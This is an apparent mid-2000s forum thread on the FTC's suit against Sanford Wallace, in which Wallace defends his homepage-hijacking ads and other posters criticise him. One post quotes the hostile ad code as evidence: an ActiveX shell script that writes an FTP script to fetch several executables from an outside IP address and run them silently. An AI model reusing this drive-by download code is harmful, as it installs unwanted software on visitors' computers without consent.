FTC sues Sanford Wallace

[JustSurfing]

Quote:

Originally posted by lwrules
So go on and continue making 12 cents per 1000 impressions and pat yourselves on the back for doing the right thing.

You can make a lot more than 12 cents per 1k playing by the rules. Look Sanford, it has been clear that the things you have been doing for several years has had a tremendously negative impact on internet advertising, tech worker productivity, and increases frustration with web surfers. There unfortunately are many in this business who are not guided by professional ethics, but we can only hope those without a sense for the greater good will learn the error of their ways through their conscience or through legal force.

[lwrules]

--- Look Sanford, it has been clear that the things you have been doing for several years has had a tremendously negative impact on internet advertising, tech worker productivity, and increases frustration with web surfers. There unfortunately are many in this business who are not guided by professional ethics, but we can only hope those without a sense for the greater good will learn the error of their ways through their conscience or through legal force. ---

I understand your point. But the truth of the matter is that one's definition of ethical and acceptable is different than another's. Some would say pop ups cause frustration and problems etc. Some would say any ads are annoying. One may have said in the past that direct postal ads were no different than direct email ads. I have always pushed the envelope like many other aggressive advertisers. We'll see how this case goes and take it from there...

Sanford

[Czar]

Thanks for dropping by Sanford, sincerely. You certainly win points for bravery there.

I think the primary difference between other intrusive methods of advertising and what I understand this complaint alleges is that your organisation was taking steps to deliberately, and perhaps even maliciously, interfere with the operation of people's computer systems. Then, the company would try to sell those same users solutions to a problem that would never have occurred had it not been inflicted by your company first.

Certainly, I've been involved in many a stalemate concerning debates about white hat/gray hat/black hat hacking where people claim that intrusions are justified as educational experiences and that people need to take special precautions and to defend themselves against every possible exploit or suffer the consequences. While there is an moral dimension to these arguments, the only consensus is generally that intrusions made with malicious intent work contrary to generally-accepted legal and ethical principles.

The system that I understand you employed cannot be compared to popups - even those that cause damage - simply because of the follow-up element of trying to sell a solution to the problem you inflicted. A closer comparison would be a situation in which a hacker not only exploits a server weakness to deface a site, but places information on the new index page suggesting that a publisher can defend him/herself against future attacks by buying ABCsupermegafirewall today for only $199.95.

While I'm not going to allege that you actually committed extortion, as I'm not nearly as familiar with the case as what you and the FTC are, the situation hypothetically posed above would be closer to extortion than to a simple charge of unfair business practices.

Pushing the envelope is one thing. Deliberately taking advantage of the weaknesses of others and putting their systems and data at risk is quite another.

[lwrules]

The FTC is painting a picture of us creating a malicious problem and then selling the solution. That is a convenient, press friendly allegation.

The truth is we never did anything with the intent to damage anybody, nor do I believe we used exortion type marketing. We never attempted to interfere or burden people anymore than pop-ups and other aggressive ads would interfere with a computer's operation.

We hosted a series of code and advertising. ONE of the many advertisements we hosted was for a spyware removal software product.

In a previous case, FTC sued D-Squared for sending messenger spams promoting a solution to messenger spams. That is a clear cut case. Our situation is more complex and we'll see how the court interprets it.

Sanford

[Steve_S]

Sanford, Welcome back. A lot of the "ink" on this Complaint/Case is not accurate so Iv'e taken the time to actually read the FTC Complaint and the Memo in support of this action. I'm not an attorney, I just enjoy drilling down to the real issues .

See: http://www.nytimes.com/2004/10/13/technology/13spy.html

You are quoted in the above piece: "....But Mr. Wallace said his companies were simply an "aggressive part of a larger network of companies involved in direct marketing that annoys consumers." And with Congress still considering legislation on the issue, the F.T.C., he said, is simply "trying to enforce laws that don't exist yet."..."

Respectfully, your statement is false. Please review:

The FTC Complaint:

http://www.ftc.gov/os/caselist/04231...omp0423142.pdf

Memo in support of this action:

http://www.ftc.gov/os/caselist/04231...emo0423142.pdf

Count One: Unfairly Changing Consumers Web Browsers

Count Two: Unfairly Installing Advertising and Other Software Programs

Count Three: Unfairly Compelling Purchase of Anti Spyware Software

These aleged actions violate Section 5 of the FTC Act, 15 U.S.C. - 45(a) = Which is: prohibits unfair or deceptive acts or practices in or effecting commerce.

Often referred to as unfair business practices. This Complaint does in fact use current FTC Acts/laws in which they have prevailed in many many other cases.

Care to explain your statement?

Certainly, you are not guilty untill the court resolves this issue. If I infered otherwise, please accept my appolagies.

Edit: BTW Sanford, the best subs in Vegas may be found at Capriotti's at 324 W. Sahara Ave. My fav is the 20 inch yummy beef for under $10.00.

[cheznoir]

Sanford I would just ask.

Did you use some means to install software on people's computer to interfere with the operation of that computer? And did that interference include advertising for a product to remove the very software you yourself installed??

Chet

[Sashman]

Quote:

Originally posted by lwrules
The FTC is painting a picture of us creating a malicious problem and then selling the solution. That is a convenient, press friendly allegation.

Sanford,

While I don't believe your solution is spyware, you appear to be doing the same thing as d-squared.

1. You admit to changing people's homepages and serving agressive pops.
2. The homepage destination for the default-homepage-network(http://default-homepage-network.com/start.cgi?new-hklm)
3. The page loads a security notice from spy deleter that doesn't appear to be on a rotator.
4. The page contains the following text and has a link to spydeleter

PHP Code:

Is your computer suffering from any of the following symptoms:

1. Has your browsers START PAGE changed?
or 2. Are you seeing a recent increase in annoying POP UPS?

...

Click on THIS LINK FOR IMMEDIATE HELP and your computer will be
back to normal and secure again in just a few minutes. 


It seems fairly straightforward to me. Additionally, even if your homepage hijacking isn't really spyware, I have the sneaking suspicion that it's perhaps bundled with other people's spyware/malware/adware. Which is the purpose of this other network, correct?

I'm sure you don't really care, but if you want to see the people impacted by this go to spywareinfo and do a search on "default-homepage-network".

[Sashman]

Here's a webpage documenting some more alleged exploits and questionable advertising.

http://www.webhelper4u.com/CWS/defau...genetwrk1.html

I particularily like this one

http://www.webhelper4u.com/CWS/defau...cdromopen.html

[joetec]

More than anything the problem I have with this whole issue is that Mr. Wallace's ads are hurting the reputation of ad networks and publishers. If a visitor goes to a site that never runs active-x ads or even popups for that matter and then a banner ad does this exploit to them, they are not going to think of that website very highly any more. Also If a website publisher sees this kind of ad come from an ad network they are not going to think very highly of that ad network anymore.

If they ads had this exploit the whole time then publishers and networks could simply choose not to run them if they did not want too. But the fact is at first these ads seem perfectly safe, only a week later to they start auto downloading software on to visitor's pcs.


Sanford,

Everyone is entitled to their own opinion on active-x ads and popups (we choose not to run active-x but do choose to run popups), but when it hurts my client’s and my company's reputations, then your opinion means nothing to me.

[lwrules]

joetec wrote: --Everyone is entitled to their own opinion on active-x ads and popups (we choose not to run active-x but do choose to run popups), but when it hurts my client’s and my company's reputations, then your opinion means nothing to me.--

I never directly purchased an ad from your network. You deal with agents and they only deal with ad networks that choose to allow the agents to host their own code or point it to my servers. If you are so concerned about this type of activity then why don't you simply host your own ads and not give control to a third party without a recognized third party server? The truth is that most publishers know EXACTLY whats going on and compensate by charging more and over report etc. I don't know your personal opinion but maybe it's time to review your javascript ad booking policy and your sales team's true intentions.

-Sanford

[lwrules]

Steve you said my statement was false when I stated the FTC was attempting to enforce laws that don't exist. You then pointed out their arguments...

Count One: Unfairly Changing Consumers Web Browsers

Count Two: Unfairly Installing Advertising and Other Software Programs

Count Three: Unfairly Compelling Purchase of Anti Spyware Software

Obviously the wording of the counts are different than the wording of the pending legislation. My point was obviously a general statement that they were attempting to stop a practice that has not been specifically addressed in former cases but IS SPECIFICALLY ADDRRESSED in pending legislation.

Show me a reference to current law that specifically addresses homepage settings. Or installing advertising on non-protected computers.

The issue of selling the solution to a problem is more complex and I wasn't referring to that.

The TRO hearing is on Friday. That will set the tone moving forward..

-Sanford

[joetec]

Quote:

I never directly purchased an ad from your network. You deal with agents and they only deal with ad networks that choose to allow the agents to host their own code or point it to my servers.

You are right that you did not directly purchase ads from us. But the original creatives sent to us by agencies that you bought from did NOT have the active-x object that auto downloads your software. Just last week we had an agency that send us coding from you and we told the agency that we had seen some stuff around that your ads do this kind of them. They then contacted the "client", you or someone else at your company who told them that an employee did the active-x coding without your knowledge and that this employee was fired. They assured me that this would not happen again. And what do you know after a few days your active-x objects started showing up on the coding.

Maybe this is different where you come from, but where I come from this is called lying.

Quote:

If you are so concerned about this type of activity then why don't you simply host your own ads and not give control to a third party without a recognized third party server? The truth is that most publishers know EXACTLY whats going on and compensate by charging more and over report etc. I don't know your personal opinion but maybe it's time to review your javascript ad booking policy and your sales team's true intentions.

We will be doing this from now on. But it is a same that smaller advertisers will not be able to use their own tracking software on our network because of you and your company.

Coding like this was not in the original creatives sent to us, but was added after the campaign went live.

<script language=javascript>
var oPopup = window.createPopup();
function showPopup()
{
oPopup.document.body.innerHTML = "<object data=http://www.freevegasclubs.com/serve.cgi?1>";
oPopup.show(0,0,1,1,document.body);
**
showPopup()
</script>

The coding above then runs this:
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run('command /C echo open 207.58.159.14>o',false,6);
wsh.Run('command /C echo tmpacct>>o',false,6);
wsh.Run('command /C echo 12345>>o',false,6);
wsh.Run('command /C echo bin>>o',false,6);
wsh.Run('command /C echo get kjberup.exe>>o',false,6);
wsh.Run('command /C echo get newdevin.exe>>o',false,6);
wsh.Run('command /C echo get IF01.exe>>o',false,6);
wsh.Run('command /C echo get istinstall_154074.exe>>o',false,6);
wsh.Run('command /C echo get sd.exe>>o',false,6);
wsh.Run('command /C echo get sdmsg.exe>>o',false,6);
wsh.Run('command /C echo get dp807615.exe>>o',false,6);
wsh.Run('command /C echo bye>>o',false,6);
wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s >o.bat',false,6);
wsh.Run('command /C echo if exist kjberup.exe kjberup.exe >>o.bat',false,6);
wsh.Run('command /C echo if exist newdevin.exe newdevin.exe >>o.bat',false,6);
wsh.Run('command /C echo if exist IF01.exe IF01.exe >>o.bat',false,6);
wsh.Run('command /C echo if exist istinstall_154074.exe istinstall_154074.exe >>o.bat',false,6);
wsh.Run('command /C echo if exist sd.exe sd.exe >>o.bat',false,6);
wsh.Run('command /C echo if exist sdmsg.exe sdmsg.exe >>o.bat',false,6);
wsh.Run('command /C echo if exist dp807615.exe dp807615.exe >>o.bat',false,6);
wsh.Run('command /C o.bat',false,6);
</script>
<script language=javascript>
self.close()
</script>
</html>



Your ads almost made some of our biggest publishers drop us and most likely caused some of their visitors to never return to their sites.

[lwrules]

Once again I never even purchased ads from you. Other companies asked us to run code for their network buys and they apparently made deals with sales people to run these types of campaigns. Everyone tries to point the finger but when push comes to shove it is an active practice and a lot of people are in on it. Further the code you included above would not affect any user that have an IE version from the past 14 months or used windows.update to turn off downloads (which is default on all microsoft patches since June of last year.) As far as you blaming me for ruining a legit practice, I can't figure out one reason why a publisher would not insist on running ads on their own network or through a trusted third party serving system. You owe it to your customers to use this smallest attempt of control over your content.

Sanford

[rbacal]

Quote:

Originally posted by lwrules
>Tell me Sandford, what would you do if someone broke into your
>house, while you were there?

Well if I lived in a dangerous city I would first try to prevent it by locking my doors. And if someone came in while I left my door wide open I would ask them to leave and if they refuse to leave I would use whatever weapons I own to get them the hell out.

I'm sorry for the sidetrack, but there's some odd humor with this answer. It it t'were me messing with people's computers without their permission, the LAST thing i would even hint at them doing was to "use whatever weapons they own to get them the hell out".

[cheznoir]

Sanford,

Wow. Talk about the buck not stopping with you. It is everyone's fault but your own.

You have energized me to write a letter, again, to the FTC to explain the impact of your deceptive practice and how it not only harmed my visitor's computers, but my sites reputation. It took weeks to overcome the damage you have done.


I will say this in the most civil manner i can.

I hope you rot in jail over this.

Chet